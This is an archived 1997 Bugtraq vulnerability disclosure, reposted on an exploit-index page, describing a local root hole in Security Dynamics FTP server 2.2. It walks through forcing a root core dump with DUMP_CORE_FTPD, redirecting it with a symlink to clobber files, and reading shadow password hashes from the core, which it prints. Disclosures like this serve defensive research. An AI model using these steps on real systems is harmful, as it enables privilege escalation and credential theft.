Core bug in the Security Dynamics ftp server

Summary

Description:	typical core file bug
Author:	sp00n <sp00n@COUPLER.300BAUD.COM>
Compromise:	root (local)
Vulnerable Systems:	Those running the Security Dynamics FTP server (Version 2.2). This is available at least for solaris boxes.
Date:	12 November 1997

Details


Date: Wed, 12 Nov 1997 11:56:29 -0500
From: sp00n <sp00n@COUPLER.300BAUD.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Bug In Security Dynamics' FTP server (Version 2.2)

Hi,

This bug is similar to the solaris and other ftp core dump bugs, slightly
diffrent though. BTW the machine is a SPARC 20 running 2.5, You can link
files and clobber them with a core to annoy your local sys admin or, even
better get /etc/shadow, u get the point... anyways

220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
Name (.:joeuser): joeuser
331 Password required for mpotter.
Password:
230 User joeuser logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> user root DUMP_CORE_FTPD
331 Password required for root.
530 Login incorrect.
Login failed.
ftp> quote pasv
421 Service not available, remote server has closed connection
ftp> quit
$ ls -la core
-rw-r-----   1 root     network   264656 Nov 12 11:14 core
At least it dosent dump 666 like solaris's in.ftpd :) But I cant read it
:(


Not too usefull You say? welp prior to dumping the core you should link it
to ps_data or something like that then you will get this

lrwxrwxrwx   1 joeuser  network        7 Nov 12 11:07 core -> ps_data
-rw-rw-r--   1 root     sys       264656 Nov 12 11:07 ps_data

$file ps_data
ps_data:        ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'

$strings core | more

noaccess:*LK*:6445::::::
sp00n:o.IZGdC5eBTtKY:10175:7:28::::
root:aiqzotPNtTsI:9988::::::
user2:U6d5srjcJi/KU:9952::::::
joeuser:ktxVoVPQVIgc.:10175:7:28::::
root::0:root
other::1:
bin::2:root,daemon
sys::3:root,bin,adm
adm::4:root,daemon
uucp::5:root

Date: Wed, 12 Nov 1997 16:20:11 -0500
From: sp00n 
To: BUGTRAQ@NETSPACE.ORG
Subject: correction to: Bug In Security Dynamics' FTP server (Version 2.2)

Hi,

Earlier I said:

$ ls -la core
-rw-r-----   1 root     network   264656 Nov 12 11:14 core
At least it dosent dump 666 like solaris's in.ftpd :) But I cant read it
:(
----------------earlier---------

I can read it
$id
uid=779(joeuser) gid=1500(network)

It dumps as root and the GID of the user SO I CAN do a
"strings core | more"  w/o having to link it to ps_data or some root owned
file with a o+r perms

Matt

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: